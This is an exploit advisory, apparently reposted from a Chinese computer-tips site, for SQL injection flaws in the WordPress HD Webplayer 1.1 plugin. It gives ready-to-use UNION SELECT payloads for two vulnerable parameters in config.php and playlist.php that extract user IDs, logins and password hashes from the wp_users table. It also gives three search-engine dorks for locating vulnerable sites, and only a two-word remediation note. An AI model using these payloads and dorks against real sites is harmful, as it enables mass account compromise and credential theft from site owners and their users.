标题 Wordpress HD Webplayer 1.1 SQL Injection
作者: JoinSe7en
程序官网:
软件连接:
影响版本: version 1.1
已测试系统: Windows 7, Backtrack 5 r3
+----------------------------------------------------------------------+
| 缺陷1 - config.php |
+----------------------------------------------------------------------+
# Location:
/wp-content/plugins/hd-webplayer/config.php?id= [INJECT HERE]
# Exploit Code:
config.php?id=1+/*!UNION*/+/*!SELECT*/+1,2,3,group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),5,6,7+from+wp_users //Number of columns may be different
+----------------------------------------------------------------------+
| 缺陷 2 - playlist.php |
+----------------------------------------------------------------------+
# Location:
/wp-content/plugins/hd-webplayer/playlist.php?videoid= [INJECT HERE]
# Exploit Code:
playlist.php?videoid=1+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_pass,0x3b),2,3,4,5,6,7+from+wp_users //Number of columns may be different
三个不同的搜索关键词:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
修复:针对性过滤
,www.xuhantao.com,涛涛电脑知识网